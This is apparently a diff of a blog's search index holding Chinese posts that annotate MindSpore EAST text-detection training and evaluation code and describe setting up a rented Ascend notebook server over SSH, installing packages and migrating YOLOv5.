    19
    20
    21
    22
    23
    24
    25
    class EastWithLossCell(nn.Cell):
    def __init__(self, network):
    super(EastWithLossCell, self).__init__()
    # 传入一个EAST模型,作为计算图中的网络模块
    self.east_network = network
    # 实例化了EastLossBlock类,作为计算图中的损失函数模块
    self.loss = EastLossBlock()

    def construct(self, img, true_cls, true_geo, training_mask):
    '''
    img: 输入图片
    true_cls: 分类标注
    true_geo: 位置标注
    training_mask: 训练集中的掩码(用于过滤掉非真实文本区域的数据)
    '''
    # 调用计算图进行前向计算
    socre, geometry = self.east_network(img)
    # 将计算得到的分类得分和位置信息分别传给损失函数模块进行后向计算,得到整体的损失值并返回
    loss = self.loss(
    true_cls,
    socre,
    true_geo,
    geometry,
    training_mask)
    return loss

    src/dataset.py

    create_east_dataset()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    def create_east_dataset(
    img_root,
    txt_root,
    batch_size,
    device_num,
    rank,
    is_training=True):
    # 实例化 ICDAREASTDataset 类,传入图片和文本标注的路径,用于读取并解析图像和标注
    east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
    # 生成分布式采样器,用于在多个设备之间对数据进行划分和分发。
    distributed_sampler = DistributedSampler(
    len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

    trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25), # 随机改变图像的颜色饱和度、对比度和亮度
    CV.Rescale(1 / 255.0, 0), # 对图像进行缩放
    CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), # 图像正则化处理
    CV.HWC2CHW()] # 将图像的通道维度从 HWC(高×宽×通道数)顺序转换为 CHW(通道数×高×宽)顺序
    if is_training: # 如果是训练模式
    dataset_column_names = [
    "image", # 图像
    "score_map", # 分类标注分数图
    "geo_map", # 位置标注几何图
    "training_mask"] # 训练集掩码
    # 调用 MindSpore 中的 GeneratorDataset 类生成数据集
    ds = de.GeneratorDataset(
    east_data,
    column_names=dataset_column_names,
    num_parallel_workers=32, # 数据处理和增强过程中使用的并行线程数
    # sampler 参数则指定了数据采样器,即从数据集中选择数据样本的方式,
    # 本例中使用的是前面提到的分布式采样器 distributed_sampler
    sampler=distributed_sampler)
    # 调用 map()方法将数据集中的图像列传入变换列表中的操作进行增广
    ds = ds.map(
    operations=trans_list,
    input_columns=["image"],
    num_parallel_workers=8,
    python_multiprocessing=True)
    # 使用 batch()方法将批量大小对数据集进行划分
    ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

    return ds, len(east_data)

    class ICDAREASTDataset
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    class ICDAREASTDataset:
    def __init__(self, img_path, gt_path, scale=0.25, length=512):
    super(ICDAREASTDataset, self).__init__()
    self.img_files = [os.path.join(
    img_path,
    img_file) for img_file in sorted(os.listdir(img_path))]
    self.gt_files = [
    os.path.join(
    gt_path,
    gt_file) for gt_file in sorted(
    os.listdir(gt_path))]
    self.scale = scale # 缩放比例
    self.length = length # 裁剪后的图像长度

    def __getitem__(self, index):
    with open(self.gt_files[index], 'r') as f:
    lines = f.readlines()
    vertices, labels = extract_vertices(lines) # 从文本标注中提取文本区域的顶点坐标和标注

    img = Image.open(self.img_files[index]) # 读取图像
    img, vertices = adjust_height(img, vertices) # 调整高度
    img, vertices = rotate_img(img, vertices) # 随机旋转图像
    img, vertices = crop_img(img, vertices, labels, self.length) # 将图像切割成指定长度的大小
    score_map, geo_map, ignored_map = get_score_geo(
    img, vertices, labels, self.scale, self.length) # 分类标注分数图、位置标注几何图和忽略标注
    score_map = score_map.transpose(2, 0, 1)
    ignored_map = ignored_map.transpose(2, 0, 1)
    geo_map = geo_map.transpose(2, 0, 1)
    if np.sum(score_map) < 1:
    score_map[0, 0, 0] = 1
    return img, score_map, geo_map, ignored_map

    def __len__(self):
    return len(self.img_files)

    extract_vertices()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    def extract_vertices(lines):
    '''extract vertices info from txt lines
    Input:
    lines : list of string info 输入是一个字符串列表 lines,其中每个字符串包含了一个文本区域的信息,包括顶点坐标和标签等
    Output:
    vertices: vertices of text regions <numpy.ndarray, (n,8)> 所有文本区域的顶点坐标
    labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)> 标签
    '''
    labels = [] # 存储最终的标签
    vertices = [] # 存储顶点信息
    for line in lines:
    # 通过 rstrip()和 lstrip()函数去除其前后空格和 BOM(Byte Order Mark)等特殊字符,并使用 split()函数将其切分为一个包含八个整数的列表
    vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
    label = 0 if '###' in line else 1
    labels.append(label)
    # 返回顶点和标签的 numpy 数组
    return np.array(vertices), np.array(labels)

    adjust_height()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    def adjust_height(img, vertices, ratio=0.2):
    '''adjust height of image to aug data
    Input:
    img : PIL Image
    vertices : vertices of text regions <numpy.ndarray, (n,8)>
    ratio : height changes in [0.8, 1.2]
    Output:
    img : adjusted PIL Image
    new_vertices: adjusted vertices
    '''
    ratio_h = 1 + ratio * (np.random.rand() * 2 - 1) # 随机调整输入图像的高度
    old_h = img.height
    # 根据输入的高度缩放比例ratio_h,计算调整后的图像新高度new_h。
    # 原始图像的高度由变量old_h指定,通过乘以缩放比例并四舍五入取整来得到调整后的高度。
    # np.around()函数是NumPy库中的一个函数,用于对数组进行四舍五入,其默认精度为0
    new_h = int(np.around(old_h * ratio_h))
    img = img.resize((img.width, new_h), Image.BILINEAR)

    new_vertices = vertices.copy()
    if vertices.size > 0:
    new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
    # 返回调整后的图像和更新后的顶点坐标
    return img, new_vertices

    rotate_img()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    def rotate_img(img, vertices, angle_range=10):
    '''rotate image [-10, 10] degree to aug data
    Input:
    img : PIL Image
    vertices : vertices of text regions <numpy.ndarray, (n,8)>
    angle_range : rotate range
    Output:
    img : rotated PIL Image
    new_vertices: rotated vertices
    '''
    # 获得中心旋转点
    center_x = (img.width - 1) / 2
    center_y = (img.height - 1) / 2
    angle = angle_range * (np.random.rand() * 2 - 1)
    # 使用了 BILINEAR 滤波器来进行图像插值,以获得更好的旋转效果
    img = img.rotate(angle, Image.BILINEAR)
    # 定义一个大小为 vertices.shape 的全零 NumPy 数组 new_vertices,用于存储旋转后的顶点坐标
    new_vertices = np.zeros(vertices.shape)
    for i, vertice in enumerate(vertices):
    # 遍历每个文本区域的顶点坐标,调用 rotate_vertices()函数来计算旋转后的新坐标,然后将其保存到 new_vertices 中
    new_vertices[i, :] = rotate_vertices(
    vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
    return img, new_vertices

    crop_img()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    def crop_img(img, vertices, labels, length):
    '''crop img patches to obtain batch and augment
    Input:
    img : PIL Image
    vertices : vertices of text regions <numpy.ndarray, (n,8)>
    labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
    length : length of cropped image region
    Output:
    region : cropped image region
    new_vertices: new vertices in cropped region
    '''
    # 获取原始图像的高度h和宽度w
    h, w = img.height, img.width
    # confirm the shortest side of image >= length
    # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
    if h >= w and w < length:
    img = img.resize((length, int(h * length / w)), Image.BILINEAR)
    elif h < w and h < length:
    img = img.resize((int(w * length / h), length), Image.BILINEAR)
    ratio_w = img.width / w
    ratio_h = img.height / h
    assert (ratio_w >= 1 and ratio_h >= 1)

    # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
    new_vertices = np.zeros(vertices.shape)
    if vertices.size > 0:
    new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
    new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

    # find random position
    # 生成随机的裁剪位置,检查裁剪区域是否与文本区域相交,避免将裁剪区域中的文本区域遮盖或截断
    remain_h = img.height - length
    remain_w = img.width - length
    flag = True
    cnt = 0
    while flag and cnt < 1000:
    # 若随机裁剪的位置与文本区域有交集,则继续生成新的随机位置,
    # 直到找到一个合适的位置或者超过最大尝试次数1000次为止
    cnt += 1
    start_w = int(np.random.rand() * remain_w)
    start_h = int(np.random.rand() * remain_h)
    flag = is_cross_text([start_w, start_h], length,
    new_vertices[labels == 1, :])
    box = (start_w, start_h, start_w + length, start_h + length)
    # 使用PIL库提供的crop()方法从原始图像中截取指定大小的区域,并将其作为本函数的输出返回。
    region = img.crop(box)
    if new_vertices.size == 0:
    # 如果不存在任何文本区域,则直接返回裁剪后的图像区域和空的新顶点坐标
    return region, new_vertices
    # 更新文本区域的顶点坐标。将新的裁剪图像左上角的坐标(start_w, start_h)作为原点,计算相对于这个原点的顶点坐标,并将这个相对坐标赋值给new_vertices
    new_vertices[:, [0, 2, 4, 6]] -= start_w
    new_vertices[:, [1, 3, 5, 7]] -= start_h
    return region, new_vertices

    eval.py

    先使用 argparse 设置一堆参数:

    nametypedefaulthelp
    –device_targetstr‘Ascend’evice where the code will be implemented. (Default: Ascend)
    –device_numint5设备数,如果只有 1 个设备的话,设成 5 不能跑,设成 0 能跑
    –test_img_pathstr‘./data/icdar2015/Test/images/’测试集地址
    –checkpoint_pathstr模型地址
    1
    2
    3
    4
    5
    context.set_context(
    mode=context.GRAPH_MODE, # 图模式
    device_target=args.device_target, # 设备类型
    save_graphs=False, # 是否保存计算图
    device_id=args.device_num) # 设备编号

    main

    设置一下模型、数据集、保存路径、开跑!

    1
    2
    3
    4
    5
    if __name__ == '__main__':
    model_name = args.checkpoint_path
    test_img_path = args.test_img_path
    submit_path = './submit'
    eval_model(model_name, test_img_path, submit_path)

    eval_model()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    def eval_model(name, img_path, submit, save_flag=True):
    '''
    name: 模型的 checkpoint 文件路径
    img_path: 测试集图片所在的文件夹路径
    submit: 输出结果保存的文件夹路径
    save_flag: 是否保存中间结果
    '''
    # 判断输出结果保存的目录是否存在,如果存在则删除该目录及其子目录,然后重新创建一个同名目录
    if os.path.exists(submit):
    shutil.rmtree(submit)
    os.mkdir(submit)
    # 构建 EAST 模型
    network = EAST()
    # 加载预训练权重参数
    param_dict = load_checkpoint(name)
    load_param_into_net(network, param_dict)
    # 设置模型为训练模式
    network.set_train(True)

    start_time = time.time()
    # 调用 detect_dataset()函数对测试集图片进行检测,并将检测结果保存到指定的输出目录 submit 中
    detect_dataset(network, img_path, submit)
    os.chdir(submit)
    res = subprocess.getoutput('zip -q submit.zip *.txt')
    res = subprocess.getoutput('mv submit.zip ../')
    os.chdir('../')
    # 调用评估脚本./evaluate/script.py 来计算模型的性能指标,评估结果保存在字符串变量 res 中
    res = subprocess.getoutput(
    'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
    print(res)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time() - start_time))

    if not save_flag:
    # 如果 save_flag 为 False,则删除输出目录及其子目录(闻到了屎山的味道)
    shutil.rmtree(submit)

    detect.py

    detect_dataset()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    def detect_dataset(model, test_img_path, submit_path):
    """
    detection on whole dataset, save .txt results in submit_path
    Input:
    model : detection model 模型实例
    device : gpu if gpu is available
    test_img_path: dataset path 测试图片所在文件夹的路径
    submit_path : submit result for evaluation 提交结果保存路径
    """
    # 读取测试集中所有的图片,并按照文件名排序
    img_files = os.listdir(test_img_path)
    img_files = sorted([os.path.join(test_img_path, img_file)
    for img_file in img_files])

    for i, img_file in enumerate(img_files):
    # 对于每一张图片,调用detect()函数进行目标检测,返回目标框的坐标信息
    print('evaluating {} image'.format(i), end='\r')
    boxes = detect(Image.open(img_file), model)
    seq = []
    if boxes is not None:
    # 如果检测结果不为空,则将框的坐标信息转换成符合要求的字符串序列并加入到列表seq中
    seq.extend([','.join([str(int(b))
    for b in box[:-1]]) + '\n' for box in boxes])
    # 将序列seq保存为与当前图片名称相同的.txt文件格式,并将其写入submit_path目录下
    with open(os.path.join(submit_path, 'res_' +
    os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
    f.writelines(seq) # 当检测完成后,输出log信息提示检测进度

    detect()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    def detect(img, model):
    """detect text regions of img using model
    Input:
    img : PIL Image
    model : detection model
    device: gpu if gpu is available
    Output:
    detected polys
    """
    # 将输入图片进行尺寸调整与相应的 ratio 变换,得到调整后的图片、高宽比例 ratio_h 和 ratio_w
    img, ratio_h, ratio_w = resize_img(img)
    # 利用模型对调整后的图片进行文字区域检测,得到概率图 score 和文本框参数 geo
    score, geo = model(load_pil(img))
    # 对概率图和文本框参数使用 PaddlePaddle 中的 Squeeze()函数进行维度降低(由 4 维转为 3 维)
    score = P.Squeeze(0)(score)
    geo = P.Squeeze(0)(geo)
    # 从降维后的概率图和文本框参数中获取文本框坐标信息,即调用 get_boxes()函数
    boxes = get_boxes(score.asnumpy(), geo.asnumpy())
    # 根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息,即调用 adjust_ratio()函数
    return adjust_ratio(boxes, ratio_w, ratio_h)

    get_boxes()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
    """get boxes from feature map
    Input:
    score : score map from model <numpy.ndarray, (1,row,col)> 概率图
    geo : geo map from model <numpy.ndarray, (5,row,col)> 文本框参数
    score_thresh: threshold to segment score map 置信度阈值
    nms_thresh : threshold in nms 非极大值抑制阈值
    Output:
    boxes : final polys <numpy.ndarray, (n,9)>
    """
    # 对输入的score进行降维,即将其转化为二维数组
    score = score[0, :, :]
    # 在降维后的score数组中,找到大于score_thresh的点,并以(r,c)的格式记录下来,形成一个n x 2的矩阵xy_text
    xy_text = np.argwhere(score > score_thresh) # n x 2, format is [r, c]
    # 按行排序xy_text,以保证前面的点在结果中优先考虑
    if xy_text.size == 0:
    return None

    # 将xy_text中的坐标信息转化为正确的x,y坐标(由于降维之前是按行major的顺序排列,因此需要将列号作为x坐标,行号作为y坐标)
    xy_text = xy_text[np.argsort(xy_text[:, 0])]
    valid_pos = xy_text[:, ::-1].copy() # n x 2, [x, y]
    # 从降维后的geo数组中提取出与xy_text中相应位置点相关的文本框参数,形成5 x n的矩阵valid_geo
    valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]] # 5 x n
    # 利用restore_polys()函数将valid_pos和valid_geo还原为文本框的坐标点集polys_restored,并得到对应的索引值index
    polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
    if polys_restored.size == 0:
    return None

    # 将polys_restored表示为(n,8)大小的数组,其中前8列分别为文本框像素点的坐标,第9列为该文本框的置信度(即所在score map中的值)
    boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
    boxes[:, :8] = polys_restored
    boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
    # 对polys_restored执行非极大值抑制(NMS)操作,得到最终的文本框坐标信息boxes
    boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
    return boxes

    adjust_ratio()

    根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def adjust_ratio(boxes, ratio_w, ratio_h):
    """refine boxes
    Input:
    boxes : detected polys <numpy.ndarray, (n,9)>
    ratio_w: ratio of width
    ratio_h: ratio of height
    Output:
    refined boxes
    """
    if boxes is None or boxes.size == 0:
    return None
    boxes[:, [0, 2, 4, 6]] /= ratio_w
    boxes[:, [1, 3, 5, 7]] /= ratio_h
    return np.around(boxes)

    跑!

    1. 变更一个 mindspore 2.0 的镜像,太旧的 mindspore 会寄……

    png

    1. EAST for Ascend - Gitee.com 把仓库整下来,最好整到 work/ 文件夹里,这样服务器重启过后数据还能保留。训练这玩意还需要:
    • Dataset: ICDAR 2015: Focused Scene Text,这个数据集,1000 张训练集,500 张测试集

    • The pretrained_path should be a checkpoint of vgg16 trained on Imagenet2012. vgg 在 Imagenet2012 里预训练过的模型,它还不给下载地址,让我找老半天,哼

      • MindSpore 官网 - 资源 - Hub 搜索 vgg16,找到 下载地址,下载 vgg16_ascend_v190_imagenet2012_official_cv_top1acc73.49_top5acc91.56.ckpt

        png

    1. 调整仓库里的 parser 参数、数据集的位置和预训练模型的位置,使得路径对应一致。

    In this project, the file organization is recommended as below:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    .
    └─data
    ├─icdar2015
    ├─Training # Training set
    ├─image # Images in training set
    ├─groundTruth # GT in training set
    └─Test # Test set
    ├─image # Images in training set
    ├─groundTruth # GT in training set

    png

    1. 安装环境一条龙!requirements.txt 里面的玩意着实难装,还是手动装好了……
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    source activate base  # 第一次进服务器激活需要 activate base
    python -c "import mindspore;mindspore.run_check()" # 查看 mindspore 版本
    conda create -n east --clone base # 克隆 base 环境
    conda activate east # 激活 east 环境
    pip install numpy
    pip install opencv-python
    pip install shapely
    pip install pillow
    pip install lanms-neo
    pip install --upgrade setuptools # 更新 setuptools
    pip install Polygon3 # 这个库很难装,可能需要更新 setuptools
    pip install onnxruntime

    ​ 装好环境后可以保存一下镜像,这样下次重开服务器的时候就会保留之前安装好的环境:

    png

    1. 切到仓库目录,开跑 train.py
    1
    2
    cd /home/ma-user/work/east/
    python3 train.py

    png

    ​ 显示完超参数后,就开始 train 了,继续等呗。

    png

    1. 训练时间从 14:2718:41,就能炼出仙丹一枚:checkpoint_east-600_125.ckpt

    png

    1. 设置一下 eval.py 的参数:
    • --device_num Ascend 设备的数量,因为我只租了 1 个,所以设为 0
    • --test_img_path 测试集路径,evaluate 时会读取这里面的图片
    • --checkpoint_path 模型的路径,把它设为刚刚炼好的仙丹的路径:outputs/2023-05-15_time_14_27_25/ckpt_0/checkpoint_east-600_125.ckpt

    png

    1. The evaluation scripts are from ICDAR Offline evaluation and have been modified to run successfully with Python 3.7.1.

      从上面这个链接里下载 script_test_ch4_t1_e1-1577983151.zip,并放在 evaluate/中:

      png

    2. 开跑 eval.py

    1
    python3 eval.py

    ​ 然后就能在 submit\ 里查看评估结果,和 ground truth 参考一下,能识别一点点东西。

    png

    ​ 返回出来的效果比它宣传的要差好多啊,呜呜呜……

    1
    Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
    ]]>
    @@ -6883,7 +6883,7 @@ /posts/Server-%E4%B8%AD%E5%8E%9F%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83%EF%BC%88%E5%90%84%E7%A7%8D%E5%AF%84%EF%BC%89/ - 前言

    为了白嫖这个资源:中原人工智能计算中心云运营平台 (xckpjs.com),学!

    正文

    接服务器

    1. 登录:中原人工智能计算中心云运营平台 (xckpjs.com)

    png

    1. 云资源-ModelArts 控制台-进入 HCS Online

    png

    1. 开发环境-Notebook-创建

    png

    1. 设置好名称自定义镜像选择:mindsprore-tensorflow-pytorch v1.3

    png

    1. SSH 远程开发要打开,密钥对自己新建一个,点立即创建

    png

    1. 创建好后会自动下载一个私钥KeyPair-9944.pem,还要你妥善保管,存到一个记得住的文件夹里

    png

    png

    1. 回到创建 Notebook 的界面,刷新密钥对,选择刚刚创建的密钥对KeyPair-9944.pem,然后立即创建

    png

    png

    png

    1. 等好了!

    png

    1. 下载安装并打开 MobaXterm :https://en.softonic.com/download/moba/windows/post-download(这个网站好像要翻墙)

    png

    1. Session - SSH,点击你创建的 Notebook 的名称查看详细信息

    png

    1. 根据你创建的 Notebook 的参数 ssh://ma-user@authoring-ssh.cncentral231 .xckpis.com:31374 输入 SSH settings 中的参数:

    png

    • Basic SSH settings
      • Remote host * ,输入@authoring-ssh.cncentral231.xckpjs.com
      • Specify uername 打勾,输入 ma-user
      • 端口号,输入 31374
    • Advanced SSH settings
      • Use private key 打勾,选择之前下载到的 KeyPair-9944.pem,然后 OK

    png

    1. login as : ma-user,回车

    png

    1. 吃饭,后面请教牛逼的伟哥

    png

    1. 试一试:
    import torch_npu as torch

    torch.npu.is_available()
    True

    PyCharm

    配置

    1. 先整一个专业版的 PyCharm,谢谢小迷糊!

    png

    1. 在 Pycharm 中随便打开一个项目(就你了,yolov5-5.0 ultralytics/yolov5 at v5.0 (github.com)),Tools-Deployment-Configuration:

    png

    1. 点击 SSH configuration... 以设置 SSH configuration

    png

    1. 根据你创建的 Notebook 的参数 ssh://ma-user@authoring-ssh.cncentral231.xckpjs.com:30376,设置参数:
    • Host: authoring-ssh.cncentral231.xckpjs.com
    • Username: ma-user
    • Authentication type: Key Pair
    • Private key file: 之前存的 KeyPair-9944.pem 的地址

    Test Connection 显示 Successfully connected! 即可。

    png

    1. 在服务器中新建一个文件夹,用于存放项目文件,只有放在work文件夹里,下次再打开服务器时内容才不会丢失:

    /home/ma-user/work 目录下的数据会保存,其余目录下内容会被清理。如果需要保存开发环境,可以通过保存镜像的方式保留开发环境设置。

    png

    1. 服务器中新建一个新的虚拟环境:yolov5
    conda create -n yolov5 python=3.7
    source activate yolov5
    which python

    linux 环境下的 which python 可以返回当前虚拟环境下的解释器位置:~/.conda/envs/yolov5/bin/python

    1. 设置解释器:Pycharm 下 File-Settings-Project: yolov5-5.0-Add Interpreter,选择 Existing 和对应的 SSH Server 地址:

    png

    1. 设置好解释器和对应的服务器目录:

    png

    1. 此时服务器里就会同步 yolov5 这个项目了,等待同步完成

    png

    1. requirements.txt 里,删除 torch>=1.7.0torchvision>=0.8.1 这两行

    png

    1. 在服务器中安装环境,这个服务器自带 1.8.1 版本的 pytorch,对应的是 0.9.1 的 torchvision,必须设定好版本,不然会寄:
    cd /home/ma-user/work/yolov5-5.0/
    pip install -r requirements.txt
    pip install torchvision==0.9.1
    1. 在自己的 Notebook 中选择 更多-保存镜像,以在下次启动服务器时,配置的环境不丢失。

    png

    开跑(寄)

    1. 开跑 detect.py!喜提错误:ImportError: libGL.so.1: cannot open shared object file: No such file or directory,使用命令pip install opencv-python-headless填之。

    2. 开跑 detect.py!喜提错误:cv2.error: OpenCV(4.7.0) /io/opencv/modules/highgui/src/window.cpp:1272: error: (-2:Unspecified error) The function is not implemented. Rebuild the library with Windows, GTK+ 2.x or Cocoa support. If you are on Ubuntu or Debian, install libgtk2.0-dev and pkg-config, then re-run cmake or configure script in function ‘cvShowImage’,问 ChatGPT,说这个报错可能是由于 OpenCV 没有启用 GUI 支持导致的,于是我把 --view-img 关了,能跑了,但是没有识别结果,giao!

    png

    算法迁移文档

    迁移适配流程

    png

    昇腾平台是否已适配需求算法

    最新 modelzoo 地址以链接实时更新为准:ModelZoo 查询及提问链接 (yuque.com)

    一、模型适配于昇腾平台

    1. 模型适配于 mindspore

    gitee 提问链接:Issues · MindSpore/mindspore - Gitee.com

    1. MindSporeModelZoo 模型库 (模型适配于 mindspore)
    2. 模型适配于 NPU

    gitee 提问链接:Issues · Ascend/modelzoo - Gitee.com

    1. AscendModelZoo 模型库—gitee

    2. AscendModelZoo 模型库—官网展示

    3. Modelzoo-Pytorch 模型库

    4. Modelzoo-Tensorflow 模型库

    5. Modelzoo-yolo 系列 模型库

    二、模型未适配于昇腾平台

    1. 第三方框架迁移至 mindspore

    2. pytorch 框架算法迁移至 npu

    3. tensorflow 框架算法迁移至 npu

    数据传输

    《notebook 服务器数据准备》:主要用于将测试脚本、数据集、第三方依赖包等传输到 notebook 服务器

    • 使用 linux 命令直接下载
      • 通过 wget,git 等命令直接下载
    • 在本地已准备好的数据传输到 notebook 服务器
      • 传辅较小的脚本数据或数据集时可直接通过 mobaxterm 直接上传
      • 传输较大的文件(百 G 量级)时可通过 obs 传输(先从本地传输到 obs,再从 obs 传输到 notebook 服务器)

    迁移工具

    -《迁移工具-pytorch/tensorflow 框架算法迁移至 mindspore 框架》:迁移工具-x2mindspore (yuque.com)
    -《迁移工具-pytorch 框架算法迁移至 Ascend》:迁移工具-Pytorch Gpu2Ascend 脚本迁移工具 (yuque.com)
    -《迁移工具-tensorflow 框架算法迁移至 Ascend》:迁移工具-Pytorch Gpu2Ascend 脚本迁移工具 (yuque.com)

    1. 创建 notebook 服务器并登录
    2. 命令行使用迁移工具分析脚本
    3. 输出
      • 迁移后脚本
      • 支持算子列表 supported_api.csv
      • 不支持算子列表 unsupported_api.csv
    4. 按照不支持算子列表 unsupported_api.csv 建议进行修改

    参考资料汇总

    算法迁移实践(寄)

    1. 进入迁移工具所在目录并执行迁移命令
    cd /usr/local/Ascend/ascend-toolkit/latest/tools/x2mindspore
    1. 设置好待迁移的工程 /home/ma-user/work/yolov5-5.0/ 和迁移后的目录位置 /home/ma-user/work/yolov5-5.0-mindspore

    png

    1. 开跑!
    ./run_x2mindspore.sh -i /home/ma-user/work/yolov5-5.0/ -o /home/ma-user/work/yolov5-5.0-mindspore -f pytorch

    喜提错误:ModuleNotFoundError: No module named ‘libcst’,堵它:pip install libcst

    1. 继续开跑!

    png

    等等等……等到 X2MindSpore run success, welcome to the next use. 就可以 next use。

    1. 把迁移好的项目下载到本地:

    png

    1. 设置完解释器,然后修修补补……

    要按照不支持算子列表 unsupported_api.csv 建议进行修改……emmmmm……要不以后还是用现成的吧。

    跑现成的框架(寄)

    教程:Yolov5-PyTorch (hiascend.com)

    就继续是你了,YOLOv5-6.0(说只有 6.0 以上版本才支持 NPU……)!

    1. built-in/PyTorch/Official/cv/object_detection/Yolov5_for_PyTorch_v6.0 · Ascend/modelzoo-GPL - 码云 - 开源中国 (gitee.com) 下载项目文件 Yolov5_for_PyTorch_v6.0

    png

    1. 设置解释器

    png

    1. 开跑 detect.py!然后喜提错误:AttributeError: module ‘torch.npu’ has no attribute ‘is_available’,在utils/torch_utils中将import torch改成import torch_npu as torch

    啊啊啊啊啊后面什么乱七八糟的啊啊啊啊啊

    跑一个 Mindspore 支持的框架

    models: Models of MindSpore (gitee.com) 里面找一个喜欢的,就决定是你了,EAST!models: Models of MindSpore - Gitee.com

    居然没寄!见 下一篇 博客!

    ]]>
    + 前言

    为了白嫖这个资源:中原人工智能计算中心云运营平台 (xckpjs.com),学!

    正文

    接服务器

    1. 登录:中原人工智能计算中心云运营平台 (xckpjs.com)

    png

    1. 云资源-ModelArts 控制台-进入 HCS Online

    png

    1. 开发环境-Notebook-创建

    png

    1. 设置好名称自定义镜像选择:mindsprore-tensorflow-pytorch v1.3

    png

    1. SSH 远程开发要打开,密钥对自己新建一个,点立即创建

    png

    1. 创建好后会自动下载一个私钥KeyPair-9944.pem,还要你妥善保管,存到一个记得住的文件夹里

    png

    png

    1. 回到创建 Notebook 的界面,刷新密钥对,选择刚刚创建的密钥对KeyPair-9944.pem,然后立即创建

    png

    png

    png

    1. 等好了!

    png

    1. 下载安装并打开 MobaXterm :https://en.softonic.com/download/moba/windows/post-download(这个网站好像要翻墙)

    png

    1. Session - SSH,点击你创建的 Notebook 的名称查看详细信息

    png

    1. 根据你创建的 Notebook 的参数 ssh://ma-user@authoring-ssh.cncentral231 .xckpis.com:31374 输入 SSH settings 中的参数:

    png

    • Basic SSH settings
      • Remote host * ,输入@authoring-ssh.cncentral231.xckpjs.com
      • Specify uername 打勾,输入 ma-user
      • 端口号,输入 31374
    • Advanced SSH settings
      • Use private key 打勾,选择之前下载到的 KeyPair-9944.pem,然后 OK

    png

    1. login as : ma-user,回车

    png

    1. 吃饭,后面请教牛逼的伟哥

    png

    1. 试一试:
    1
    2
    3
    import torch_npu as torch

    torch.npu.is_available()
    1
    True

    PyCharm

    配置

    1. 先整一个专业版的 PyCharm,谢谢小迷糊!

    png

    1. 在 Pycharm 中随便打开一个项目(就你了,yolov5-5.0 ultralytics/yolov5 at v5.0 (github.com)),Tools-Deployment-Configuration:

    png

    1. 点击 SSH configuration... 以设置 SSH configuration

    png

    1. 根据你创建的 Notebook 的参数 ssh://ma-user@authoring-ssh.cncentral231.xckpjs.com:30376,设置参数:
    • Host: authoring-ssh.cncentral231.xckpjs.com
    • Username: ma-user
    • Authentication type: Key Pair
    • Private key file: 之前存的 KeyPair-9944.pem 的地址

    Test Connection 显示 Successfully connected! 即可。

    png

